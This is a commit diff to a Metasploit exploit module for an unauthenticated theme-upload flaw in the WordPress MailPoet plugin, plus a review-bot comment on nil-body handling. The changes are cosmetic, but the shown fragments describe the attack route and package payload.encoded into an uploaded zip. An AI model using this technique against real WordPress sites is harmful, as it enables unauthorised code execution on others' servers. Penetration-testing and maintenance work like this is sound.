Small fixes for the recent WP MailPoet module

Correct casing in the title
Anchor the use of ::File
Force body.to_s since it can be nil in corner cases
HD Moore 2014-07-05 13:17:23 -05:00
parent 98a82bd145
commit 6d9bf83ded
1 changed files with 8 additions and 8 deletions


@ -13,13 +13,13 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated file Upload', 'Name' => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload',
'Description' => %q{ 'Description' => %q{
The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7 The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7
is vulnerable to an unauthenticated file upload. The exploits uses the upload Theme is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme
functionality to upload a zip file containing the payload. The plugin used the functionality to upload a zip file containing the payload. The plugin used the
admin_init hook without knowning the hook is also executed for unauthenticated admin_init hook, which is also executed for unauthenticated users when accessing
users when calling the right URL. a specific URL.
}, },
'Author' => 'Author' =>
[ [
@ -46,8 +46,8 @@ class Metasploit3 < Msf::Exploit::Remote
# -) Additional files in the folder # -) Additional files in the folder
content = { content = {
File.join(theme_name, 'style.css') => '', ::File.join(theme_name, 'style.css') => '',
File.join(theme_name, payload_name) => payload.encoded ::File.join(theme_name, payload_name) => payload.encoded
} }
zip_file = Rex::Zip::Archive.new zip_file = Rex::Zip::Archive.new
@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
# try to extract version from readme # try to extract version from readme
# Example line: # Example line:
# Stable tag: 2.6.6 # Stable tag: 2.6.6
version = res.body[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1] version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
# readme present, but no version number # readme present, but no version number
if version.nil? if version.nil?
@ -132,4 +132,4 @@ class Metasploit3 < Msf::Exploit::Remote
'method' => 'GET' 'method' => 'GET'
}) })
end end
end end
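Review bot: In the hunk at -72,7, `res.body.to_s` stops the nil crash, but a nil or empty body now falls into the `version.nil?` branch that the comment labels "readme present, but no version number". What that branch returns is outside the hunk; if it reports the plugin as detected, a 200 response with no body would be counted as evidence that the plugin is installed. Consider handling the empty case separately before the regex, e.g. `return Msf::Exploit::CheckCode::Unknown if res.body.to_s.empty?`, and adding a short comment such as `# body can be nil in corner cases` so the `.to_s` is not removed later. The enclosing method starts and ends outside the hunk, so whether `res` itself is nil-checked before this line cannot be confirmed from here.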